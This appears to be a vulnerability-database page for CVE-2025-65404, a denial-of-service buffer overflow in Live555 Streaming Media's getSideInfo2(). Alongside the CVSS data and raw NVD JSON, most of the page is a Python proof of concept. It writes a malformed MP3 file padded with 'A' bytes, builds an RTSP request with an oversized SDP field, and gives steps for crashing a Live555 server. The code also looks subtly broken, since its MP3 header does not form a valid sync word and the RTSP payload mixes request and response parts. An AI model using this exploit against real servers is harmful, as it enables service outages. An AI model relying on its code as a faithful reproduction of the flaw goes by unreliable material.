Security Vulnerability Report
CVE-2025-65404 CVSS 6.5 MEDIUM

CVE-2025-65404

Published: 2025-12-01 16:15:57
Last Modified: 2025-12-23 13:51:19

Description

A buffer overflow in the getSideInfo2() function of Live555 Streaming Media v2018.09.02 allows attackers to cause a Denial of Service (DoS) via a crafted MP3 stream.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:live555:streaming_media:2018-09-02:*:*:*:*:*:*:* - VULNERABLE
Live555 Streaming Media v2018.09.02

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-65404 PoC - Live555 getSideInfo2() Buffer Overflow

This PoC generates a malicious MP3 stream that triggers buffer overflow
in the getSideInfo2() function of Live555 Streaming Media v2018.09.02
"""

import struct
import sys


def create_malicious_mp3():
    """
    Create a malformed MP3 frame that triggers buffer overflow
    in getSideInfo2() function
    """
    # MP3 Frame Header (MPEG-1 Layer III)
    # Sync word (11 bits) + Version (2 bits) + Layer (2 bits) + Bitrate index + etc.
    frame_header = 0xFF  # Sync word start
    frame_header = (frame_header << 5) | 0x06  # MPEG-1, Layer III
    frame_header = (frame_header << 4) | 0x01  # Bitrate index (128 kbps)
    frame_header = (frame_header << 2) | 0x00  # Sample rate 44100 Hz
    frame_header = (frame_header << 1) | 0x00  # Padding bit
    frame_header = (frame_header << 1) | 0x00  # Private bit

    # Create malicious side information
    # The vulnerability exists in parsing this data
    # Inject oversized data to cause buffer overflow
    malicious_side_info = b'A' * 1000  # Overflow payload

    # Main audio data
    main_data = b'\x00' * 500

    # Construct the malformed frame
    mp3_frame = struct.pack('>I', frame_header)[1:4] + malicious_side_info + main_data

    return mp3_frame


def create_mp3_file(filename, num_frames=100):
    """
    Generate a malicious MP3 file with multiple frames
    """
    with open(filename, 'wb') as f:
        for i in range(num_frames):
            frame = create_malicious_mp3()
            f.write(frame)

    print(f"[+] Malicious MP3 file created: {filename}")
    print(f"[+] Total frames: {num_frames}")
    print(f"[+] File size: {num_frames * len(create_malicious_mp3())} bytes")


def create_rtsp_stream_payload():
    """
    Create RTSP stream payload for remote exploitation
    """
    rtsp_options = (
        "DESCRIBE rtsp://target-server/stream.mp3 RTSP/1.0\r\n"
        "CSeq: 1\r\n"
        "Accept: application/sdp\r\n"
        "\r\n"
    )

    malicious_sdp = (
        "v=0\r\n"
        "o=- 1234567890 1234567890 IN IP4 127.0.0.1\r\n"
        "s=Malicious Stream\r\n"
        "c=IN IP4 0.0.0.0\r\n"
        "t=0 0\r\n"
        "m=audio 0 RTP/AVP 14\r\n"
        "a=control:streamid=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...\r\n"
    )

    return rtsp_options + malicious_sdp


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-65404 PoC - Live555 Buffer Overflow")
    print("=" * 60)

    # Generate malicious MP3 file
    create_mp3_file("malicious_stream.mp3", num_frames=50)

    # Generate RTSP payload
    print("\n[+] RTSP Payload for remote exploitation:")
    print(create_rtsp_stream_payload()[:200] + "...")

    print("\n[!] Usage:")
    print("[!] 1. Serve the malicious MP3 file via HTTP/RTSP")
    print("[!] 2. Wait for Live555 server to process the stream")
    print("[!] 3. The server should crash with buffer overflow")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65404", "sourceIdentifier": "[email protected]", "published": "2025-12-01T16:15:57.170", "lastModified": "2025-12-23T13:51:18.637", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A buffer overflow in the getSideInfo2() function of Live555 Streaming Media v2018.09.02 allows attackers to cause a Denial of Service (DoS) via a crafted MP3 stream."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:live555:streaming_media:2018-09-02:*:*:*:*:*:*:*", "matchCriteriaId": "C9F01989-4E5A-42B7-8EF7-74E3A5335754"}]}]}], "references": [{"url": "https://github.com/rgaufman/live555", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://shimo.im/docs/16q8xMxpPlH8Z2q7", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}